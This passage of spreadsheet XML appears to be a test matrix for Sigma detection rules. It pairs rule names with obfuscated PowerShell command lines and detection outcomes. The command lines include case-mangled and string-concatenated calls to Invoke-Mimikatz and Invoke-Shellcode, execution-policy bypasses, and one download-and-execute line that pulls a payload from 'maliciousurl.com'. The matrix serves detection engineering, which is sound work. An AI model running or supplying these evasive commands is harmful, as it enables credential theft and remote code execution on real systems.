          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2112" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F2112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2112" s="44" t="n"/>
      <c r="J2112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2112" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2113" ht="15.75" customHeight="1" s="42">
      <c r="A2113" s="43" t="n"/>
      <c r="B2113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2113" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2113" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2113" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F2113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2113" s="43" t="n"/>
      <c r="J2113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2113" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2114" ht="15.75" customHeight="1" s="42">
      <c r="A2114" s="43" t="n"/>
      <c r="B2114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2114" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2114" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2114" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F2114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2114" s="43" t="n"/>
      <c r="J2114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2114" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2115" ht="15.75" customHeight="1" s="42">
      <c r="A2115" s="43" t="n"/>
      <c r="B2115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2115" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2115" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2115" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F2115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2115" s="43" t="n"/>
      <c r="J2115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2115" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2116" ht="15.75" customHeight="1" s="42">
      <c r="A2116" s="43" t="n"/>
      <c r="B2116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2116" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2116" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2116" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F2116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2116" s="43" t="n"/>
      <c r="J2116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2116" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2117" ht="15.75" customHeight="1" s="42">
      <c r="A2117" s="43" t="n"/>
      <c r="B2117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2117" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2117" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2117" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Import-Module ('{0}\suspicious_module.psm1' -f $Env:Temp)"</t>
        </is>
      </c>
      <c r="F2117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2117" s="43" t="n"/>
      <c r="J2117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2117" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2118" ht="15.75" customHeight="1" s="42">
      <c r="A2118" s="43" t="n"/>
      <c r="B2118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2118" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2118" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2118" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2118" s="44" t="n"/>
      <c r="J2118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2118" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2119" ht="15.75" customHeight="1" s="42">
      <c r="A2119" s="43" t="n"/>
      <c r="B2119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2119" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2119" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2119" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2119" s="44" t="n"/>
      <c r="J2119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2119" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2120" ht="15.75" customHeight="1" s="42">
      <c r="A2120" s="43" t="n"/>
      <c r="B2120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2120" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2120" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2120" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2120" s="43" t="n"/>
      <c r="J2120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2120" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2121" ht="15.75" customHeight="1" s="42">
      <c r="A2121" s="43" t="n"/>
      <c r="B2121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2121" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2121" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2121" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2122" ht="15.75" customHeight="1" s="42">
      <c r="A2122" s="43" t="n"/>
      <c r="B2122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2122" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2122" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2122" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2123" ht="15.75" customHeight="1" s="42">
      <c r="A2123" s="43" t="n"/>
      <c r="B2123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2123" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2123" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2123" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2124" ht="15.75" customHeight="1" s="42">
      <c r="A2124" s="43" t="n"/>
      <c r="B2124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2124" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2124" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2124" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2125" ht="15.75" customHeight="1" s="42">
      <c r="A2125" s="43" t="n"/>
      <c r="B2125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2125" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2125" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2125" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2126" ht="15.75" customHeight="1" s="42">
      <c r="A2126" s="43" t="n"/>
      <c r="B2126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2126" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2126" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2126" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2127" ht="15.75" customHeight="1" s="42">
      <c r="A2127" s="43" t="n"/>
      <c r="B2127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2127" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2127" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2127" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I212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127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2128" ht="15.75" customHeight="1" s="42">
      <c r="A2128" s="43" t="n"/>
      <c r="B2128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2128" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2128" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2128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128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2128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128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2129" ht="15.75" customHeight="1" s="42">
      <c r="A2129" s="43" t="n"/>
      <c r="B2129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2129" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2129" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2129" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2129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129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2130" ht="15.75" customHeight="1" s="42">
      <c r="A2130" s="43" t="n"/>
      <c r="B2130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2130" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2130" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2130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130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2130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130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2131" ht="15.75" customHeight="1" s="42">
      <c r="A2131" s="43" t="n"/>
      <c r="B2131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2131" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2131" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2131" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2131" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2132" ht="15.75" customHeight="1" s="42">
      <c r="A2132" s="43" t="n"/>
      <c r="B2132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2132" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2132" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2132" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2132" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2133" ht="15.75" customHeight="1" s="42">
      <c r="A2133" s="43" t="n"/>
      <c r="B2133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2133" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2133" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2133" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2133" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2133" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2133" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2134" ht="15.75" customHeight="1" s="42">
      <c r="A2134" s="43" t="n"/>
      <c r="B2134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2134" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2134" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2134" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2134" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2135" ht="15.75" customHeight="1" s="42">
      <c r="A2135" s="43" t="n"/>
      <c r="B2135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2135" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2135" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2135" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2135" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2136" ht="15.75" customHeight="1" s="42">
      <c r="A2136" s="43" t="n"/>
      <c r="B2136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2136" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2136" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2136" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2136" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2136" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2137" ht="15.75" customHeight="1" s="42">
      <c r="A2137" s="43" t="n"/>
      <c r="B2137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2137" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2137" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2137" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2137" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2138" ht="15.75" customHeight="1" s="42">
      <c r="A2138" s="43" t="n"/>
      <c r="B2138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2138" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2138" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2138" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2138" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2139" ht="15.75" customHeight="1" s="42">
      <c r="A2139" s="43" t="n"/>
      <c r="B2139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2139" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2139" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2139" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2139" s="44" t="b">
        <v>0</v>
      </c>
